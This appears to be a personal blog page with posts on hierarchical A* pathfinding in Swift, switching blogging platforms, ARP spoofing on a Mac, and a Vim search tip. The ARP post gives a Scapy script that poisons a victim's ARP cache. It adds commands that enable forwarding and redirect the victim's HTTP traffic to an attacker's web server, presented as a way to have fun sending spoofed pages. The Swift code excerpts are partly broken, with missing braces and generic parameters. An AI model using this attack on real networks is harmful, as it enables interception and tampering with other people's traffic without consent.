Monday, January 18, 2016

Hierarchical Pathfinding

Pathfinding is a ubiquitous problem in AI and a lot of research has gone into finding effective  techniques for it. The beloved A* is usually our target weapon for search problems. Although A* is optimal it might suffer from the problem of exhausting large search spaces. This often warrants the use alternate techniques as iterative deepening to our search algorithm (e.g. IDA*) for effective solutions.  However in games and motion planning the most used algorithm is some sort of hierarchical search e.g. Hierarchical A*.

Over the past couple of weekends I've been hacking into writing my own hierarchical A* solution. I finally completed (well it can obviously still be improved) my solution this weekend. I also used Apple's new shiny programming language "Swift" to write it. I also used Adi Botea, Martin Muller and Jonathon Schaeffer's research paper on Near Optimal Hierarchical Pathfinding as my reference algorithm for implementation [1] (The scope of the algorithm is beyond this blog post. I would encourage you to read the research paper to understand the algorithm completely.)


The essence of a hierarchical algorithm is to construct abstract graphs at higher levels of hierarchy and start your initial search from these higher levels moving down towards the original graph. The main complexity of the algorithm is to construct and maintain these graphs. It is also these abstract graphs which drive the performance of our search since the search space in higher level graphs is far reduced and we can theoretically build our solution incrementally.

Clusters and Entrances

The algorithm in itself is not very complicated. You initially have a grid space (m x n) space which is divided into clusters, where each cluster is of size (c x c). The cluster boundaries are marked with entrance points. Clusters are entered and exited via these entrance points. The way Botea's research defines an entrance point is to find a contiguous boundary between two clusters that allow free movement i.e. nodes on both clusters are walkable. From such a contiguous region you usually choose the middle point as the entrance point.

 func createEdgesAcrossClusters(entrances: [Entrance]) {
    for entrance in entrances {
      let idx1 = world.graph.nodeIdForPositionWithRow(
        entrance.center1Row, col: entrance.center1Col)
      let idx2 = world.graph.nodeIdForPositionWithRow(
        entrance.center2Row, col: entrance.center2Col)
      if let absId1 = nodeIdToAbsNodeId[idx1!],
        absId2 = nodeIdToAbsNodeId[idx2!] {
          let n1 = absGraph.nodeById(absId1)
          let n2 = absGraph.nodeById(absId2)
          let e1 = addEdgeBetweenAbsNodes(n1, n2, withCost: 1)
          let e2 = addEdgeBetweenAbsNodes(n2, n1, withCost: 1)
          e1.isInter = true
          e2.isInter = true
      } else {
        assertionFailure("Cannot find graph nodes with index \(idx1) and \(idx2)")

Abstract Graph

From the clusters and entrances created above we next create an abstract graph. As entrances exist as entrance points for each entrance point we create two abstract nodes, one for each cluster. These abstract nodes created are connected by inter-cluster edges each having a weight of 1. All abstract nodes within a cluster are also connected by edges marking the distance needed to travel within them. It is easy to visualize this abstract graph.


Finally we are ready to run our search algorithm. However before doing that we insert the start and end nodes into our abstract graph. Once we have a path from a higher level of hierarchy we move to the next lower level and finally end up in the original graph wherein we reconstruct our final solution.

func pathFromRow(startRow: Int, col startCol: Int,
    toRow endRow: Int, col endCol: Int) -> [Point]? {
      guard let (absStartId, absEndId) = addToAbsGraphStart(
        startRow, startCol, end: endRow, endCol) else {
          assertionFailure("Could not add start and end abs nodes.")
          return nil

      defer {
        removeFromAbsGraphStartRow(startRow, col: startCol,
          endRow: endRow, col: endCol)

      if let absPath = absWorld?.searchPathFrom(absStartId!, to: absEndId!) {
        return constructPathFromAbsGraphPath(absPath)
      } else {
        return nil

Big Wins/Caveat

The algorithm wins big in it's incremental build up. If the start and end points are widely separated there would be a lot of clusters between them and we only really need to know/compute how to start our movement and then construct the rest of the path on the fly. 

One caveat the algorithm suffers from is dynamic environments. Since in dynamic environments the cluster entrances are no longer static we need to rebuild such entrances whenever the environment in a cluster changes. However clusters are usually small in size (10x10 or 20x20) and thus rebuilding their information might not be too much of overhead. 

Swift Learnings

The implementation in Swift was a nice working experience. A strong type system with a protocol oriented programming approach does make a lot of things nice. For instance it is much easier to rationale about the algorithm and why it's not working. The support for "Optionals" in Swift is pretty nice and expresses the programmer intent in a much cleaner way. "guard" and "defer" are well designed and thought about operations and do make the code look much more cleaner. The functional approach to writing algorithms might not always be the best performance wise but is certainly easier to understand and read and I guess optimize in a multi-threaded environment. 

Swift is still an evolving language so it still lacks a few things e.g. Self referential generic types are not truly supported. This was a big pain and the Swift team has come up with a hackish solution of wrapping such protocols in "Any" structs 

protocol OpenList {
  typealias ItemType
  func isEmpty() -> Bool
  func addNode(node: ItemType)

class AnyOpenList : OpenList {
  typealias ItemType = T

  let _isEmpty: Void -> Bool
  let _addNode: (T -> Void)

  init(_ u: U) {
    _isEmpty = u.isEmpty
    _addNode = u.addNode

  func isEmpty() -> Bool { return _isEmpty() }

  func addNode(node: T) { _addNode(node) }


Here is an example of how clusters are created in an open space environment. The white squares represent walkable grids. Non-walkable grid spaces are marked with black (missing here). The nodes marked as grey are part of the abstract graphs. The red lines are the edges in the abstract graph. All of the edges are bidirectional.

Note that the yellow line marks an optimal A* search from red to green. Here below is the my implementation of hierarchical A* in the above graph. You will observe how the final path follows the cluster entrances. Also you can note that the hierarchical solution is "not optimal" which is obvious since our solution is only cluster-optimal and we trade-off optimality in the hierarchical graph for speed.

Finally here is a working solution in a much more complex graph. You can see how the different clusters are created and joined together.

1 Near Optimal Hierarchical Path-Finding

Tuesday, October 27, 2015

Back to Blogger

I've decided to switch back to blogger even for my coding needs. I experimented for a year with WordPress using Dreamhost but didn't find the hassle of maintaining it nice. I also forgot to renew my hosting on time and lost all my blog data on Dreamhost. It's much easier to maintain Blogger if I'm not going to blog often as happened the last time.

I think having your own hosting server is a good solution if you blog often but for other cases I think Blogger just works fine.

Monday, October 26, 2015

ARP Spoofing on Mac

ARP referrs to Address Resolution Protocol that is used to resolve Internet layer addresses (IP address) to link layer addresses (MAC address). Since the data transfer takes place below the link (or data link layer) every system needs to have the MAC address to be able to deliver a packet. So if I type in my browser my request first needs to go to a gateway(usually a router) which then puts it out into the world. ARP is used to do this mapping between the IP address and the MAC address.

ARP is a stateless protocol. Network hosts usually cache the ARP replies they receive. These mappings can be seen in the arp table using
>> arp -a 
The protocol consists of a simple request and reply mechanism to associate IP's with MAC addresses. But sadly the protocol doesn't contain any method to authenticate these ARP packets. So if somebody sends you a fake ARP request you don't have any mechanism to confirm it's veracity.

If I wanted to spoof an arp table entry I would just send you a malicious ARP request. Most likely you would already have an ARP table entry for this request so it would be flagged as a duplicate but most OS'es do not discard these duplicates. For example Linux ignores unsolicited replies, but on the other hand uses seen requests from other machines to update its cache. If you constantly bombard the victim with these ARP requests the ARP table would be poisoned. Here's a script that does that

from scapy.all import *
import time

op = 1

victim_ip = ''; # victim
ip_to_spoof = ''; # gateway
attacker_mac = ''; # attacker's mac
arp = ARP(op=op, psrc=ip_to_spoof, pdst=victim_ip, hwdst=attacker_mac)

while True: 

It uses scapy as a dependency to create and send packets. Once you run the above script you can check the new spoofed entry in the victim's arp table using `arp -a`. Now all of the victim's traffic is going through your IP and since most likely you wouldn't have IP forwarding enabled the victim would be getting 404's.

To make it a bit more fun you can also enable IP forwarding and have some fun sending spoofed pages to the victim. For example you can do this.

# Enable packet forwarding on mac
sudo sysctl -w net.inet.ip.forwarding=1

# Enable port forwarding on mac
sudo pfctl -e

# Add this line to your /etc/pf.conf after enabling port forwarding
rdr on en0 inet proto tcp from $victim_ip to any port = 80 ->

# Reload PF configuration to apply the above filter
sudo pfctl -f /etc/pf.conf
The above line redirects all HTTP traffic to the attacker's HTTP WebServer.

Sunday, February 16, 2014

Vim Tip - Search Current Word

VIM is my favorite editor. Why? What should be a programmer's favorite editor? My answer would be one that's programmable and behold there is VIM for you*. It's so versatile that it amazes me. I keep on learning new stuff all the time.

Without further ado here is a quick tip. How do you search for the current word under your cursor with one keystroke? Use '*' or '#' to search forward and backwards respectively.

It's pretty neat and you will find it using more often then you can imagine. Whenever you're figuring out what some code does you always want to know where the current variable is being used next or previously and highlighting all of it's usage is a very common use case, that's where you can use this most often. You may find use cases for your own needs that fit the bill which is awesome.

For those folks who use XCode (it's a good enough IDE) along with XVim to get the VIM bindings for Xcode you can still use the above functionality. The only caveat is that it doesn't highlight all the instance as vim does, it would just take you to the next/previous one.

* This is based on my own feeling. You might like Emacs which again is a great editor. I've had some experience working on it but the <Ctrl> just didn't fit in.